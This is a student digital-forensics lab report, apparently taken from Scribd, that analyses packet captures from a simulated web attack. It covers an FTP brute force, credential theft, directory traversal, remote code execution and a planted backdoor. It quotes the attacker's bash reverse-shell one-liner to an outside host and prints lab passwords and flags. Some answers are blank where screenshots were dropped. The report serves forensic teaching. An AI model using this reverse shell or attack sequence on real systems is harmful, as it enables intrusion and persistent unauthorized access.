Scribd
Upload
55 views6 pages

I221725 Lab08

Uploaded by

subwaymkw
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
55 views6 pages

I221725 Lab08

Uploaded by

subwaymkw
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Digital Forensics Lab

Cyber Security Department


CYL-2002
Fall 2024
Lab #08

Submitted By:
Abdul Sami Qasim (22i-1725)
Submitted to:
Ubaid Ullah
Tasks:
Scenario:
The organization that previously hired you to investigate the web attack has reached out to you again.
This time, they have managed to capture the network traffic during the attack. They have provided you
with the captured traffic file to help piece together the attacker's intentions and the extent of the damage.
Your job is to analyze the captured traffic and answer the following questions:
Use the file challenge.pcapng for the tasks. Add screenshots of the steps followed for each task.
1. What are the different protocols present in the captured traffic file?

HTTP, FTP, ICMP, TCP/IP

2. It appears that the attacker is attempting to brute force the user's FTP password. Can you find any
evidence of a correct password, and if so, what is it?

The username was ftp and the password used was batman

3. What additional information was the attacker able to extract from the user's FTP account?

The attacker extracted credentials.txt and .bash_history.


Credentials.txt had the following information:

4. What actions did the attacker take with the information obtained from the user's FTP account?

The attacker started looking at the database with the user and pass given and was looking through
to find the root account credentials (which he did end up finding).

The attacker logged in with myuser and then performed queries as suggested in the screenshot
above to find the root credentials.

5. What's the root account password?

Username: root
Password: root1amgr000000t!@#$
Which was then changed to “root” using these commands:

6. Can you identify the packet numbers in which the attacker exploited the Remote Code Execution
vulnerability to gain access to the system? What was the exact payload used by the attacker?

The attacker performed multiple requests to command.php, starting with GET requests to probe
the page and test its availability (Packet 2647). They then attempted a directory traversal
attack via images.php to access the /etc/passwd file (Packet 2654–2655). After confirming that
commands could be executed remotely using POST requests (Packet 2665), the attacker finally
sent the reverse shell payload via Packet 2674:

bash -c 'bash -i >& /dev/tcp/192.168.0.106/4444 0>&1'

(the attacker sent the same command in packet number 2678 as well)

7. After gaining access to the system, what does the attacker seem to be doing?

The attacker first of all tried to look at flag.txt. Afterwards, he stabilized the shell using a python shell
stabilizing command and then listed the directory again where he found gr00t.txt, which he opened to
look at it’s contents and came across the flag ( flag{1_4m_gr00000t!} ).
8. The attacker read a file from root's home directory. What was in that file?

9. The attacker downloaded a file inside root's home directory. What's the purpose of that file?

As the name suggests, it’s a backdoor. It’s probably entered there to give the attacker more access
whenever he wants to later on. He does this by looking at what process python is running on,
terminating that python process with the PID 1190466 and then does this:

Here, the attacker runs the backdoor.py put into the system through root account.

10. What information was transmitted through the attacker's covertly established channel of
communication?
In the covertly established channel of communication (i.e backdoor on port 5555), the attacker
seems to put in a command “admin” and then requests data for gt00t.txt again.
Flag: stored in gr00t.txt
flag{1_4m_gr00000t!}

You might also like